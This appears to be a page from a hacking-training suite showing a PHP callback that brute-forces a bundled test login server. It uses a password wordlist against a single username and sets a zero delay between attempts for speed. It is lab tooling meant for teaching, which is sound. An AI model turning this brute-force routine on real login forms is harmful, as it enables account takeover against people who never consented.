HackSuite File Library
File Library
Here you can find the latest files and structure of the THC HackSuite. Note that if you have an earlier version of the suite, updating files manually is not recommended; instead, you should overwrite your existing HackSuite environment.
<?php
/*
Bruteforce the TestServer

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
*/
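// Refuse direct requests: the script only continues when the including code
// has already defined IN_SCRIPT.
if(!defined('IN_SCRIPT')){
    exit;
}
// properties for this callback
// (presumably a display label and the callback's file name -- confirm against the loader)
$_CBACKD = array("Attack THC_HS Login","callbackbf.php");
// we still want the callback to work when the username or the success message changes,
// so both are read from the test server script instead of being hard-coded:
// line 5 (index 4) supplies the user name and line 9 (index 8) the success message,
// each taken from the second "|"-separated field of its line.
// $_PATHS is not defined in this file; it has to come from the including script.
$aAttackVars = file($_PATHS['config_root']."/login_single_user.php");
if(!is_array($aAttackVars)){
    // file() returns false when the script cannot be read; continue with empty
    // settings rather than indexing into false
    $aAttackVars = array();
}
$aAttackVarsU = explode("|",isset($aAttackVars[4]) ? $aAttackVars[4] : "");
$aAttackVarsS = explode("|",isset($aAttackVars[8]) ? $aAttackVars[8] : "");
$aGlobalConfig = array();
// a line without a "|" has no second field; use an empty string in that case
$aGlobalConfig['user'] = isset($aAttackVarsU[1]) ? trim($aAttackVarsU[1]) : "";
$aGlobalConfig['success'] = isset($aAttackVarsS[1]) ? trim($aAttackVarsS[1]) : "";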
/* variable properties */
// One entry per form field of the scan module. Each entry holds the 'value' to
// place in the field, the 'row' and 'fieldclass' identifiers of that field and
// its 'visibility'.
// visibility: [0] => hidden, [1] => visible, [2] => don't do anything
$_CBACKV = array(
    // target: the bundled login_single_user.php test server, with the
    // "Modules/thc_ss/" part stripped from the servers root URL
    0 => array(
        'value' => @str_replace("Modules/thc_ss/","",$_PATHS['servers_root_http'])."/login_single_user.php",
        'row' => "a1",
        'fieldclass' => "a1f",
        'visibility' => 0,
    ),
    // set to zero, bcoz we wanna be as fast as possible when bruteforcing
    // (presumably the pause between requests -- confirm against the scan module)
    1 => array(
        'value' => "0",
        'row' => "a2",
        'fieldclass' => "a2f",
        'visibility' => 0,
    ),
    // the success message read from the test server script
    2 => array(
        'value' => $aGlobalConfig['success'],
        'fieldclass' => "a5f",
        'row' => "a4",
        'visibility' => 0,
    ),
    // presumably the request method -- confirm against the scan module
    3 => array(
        'value' => "post",
        'row' => "a5",
        'fieldclass' => "a6f",
        'visibility' => 0,
    ),
    4 => array(
        'value' => 1,
        'row' => "a6",
        'fieldclass' => "scanf",
        'visibility' => 2,
    ),
    // empty won't set any value
    5 => array(
        'value' => "",
        'row' => "callbackfunction",
        'fieldclass' => "callbackfunctionf",
        'visibility' => 1,
    ),
);
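if(!isset($_GETCBACK)){

    /* Script that brute forces the testserver of the hacksuite

    Callbck must always produce a query string, which will be passed back to the SScan module so it can be attached to the query string.
    NOTE 1: this function uses global variables in order to construct the string which will be added to the query.
    NOTE 2: settings from the thc_ss scan will automatically be adjusted to thc_hs' html login
    NOTE 3: don't rewrite this function, instead make a new one with the same name
    NOTE 4: every string returned carries the same user value and a different pass value taken
            from the wordlist, so the login form receives a run of attempts against one account;
            per-account attempt limits and lockouts on a login form key on exactly this pattern.

    PARAMETERS:
    NONE

    RETURNS:
    STRING: query string OR break key word BREAK
    */

    if(!function_exists("Callbck")){
        function Callbck(){
            global $iOffsetKeyword;
            global $aListWord;
            global $aGlobalConfig;
            if(!isset($aListWord[$iOffsetKeyword])){
                // no word left at the current offset: break script
                return("BREAK");
            }
            // file() keeps the line ending of each word, hence the trim()
            $sString = "user=".$aGlobalConfig['user']."&pass=".trim($aListWord[$iOffsetKeyword]);
            // advance to the next word for the following call
            $iOffsetKeyword++;
            return($sString);
        }
    }

    // load thc wordlist
    // ($sOut and $sEnd are not defined in this file; they have to come from the including script)
    if(false===($aListWord = @file($_PATHS['wordlists_root']."/pw_a.txt"))){
        die($sOut."You need the wordlist associated with the login_single_user.php server.".$sEnd);
    }

    $iOffsetKeyword = 0;

    // dissect the target
    $aUrl = @parse_url($_CBACKV[0]['value']);
    if(!is_array($aUrl)){
        // parse_url() returns false for a URL it cannot parse; keep $aUrl an array
        // so the key written below does not land on a boolean
        $aUrl = array();
    }

    // set loops variable
    $iLoops = count($aListWord);

    // make a copy of the old query (empty string when the target URL has none)
    $aUrl['queryold'] = (isset($aUrl['query']) && $aUrl['query']!="" ? $aUrl['query'] : "");
}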
?>
disclaimer
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
Created by Remco Kouw. Powered by protein shakes and a high calorie diet.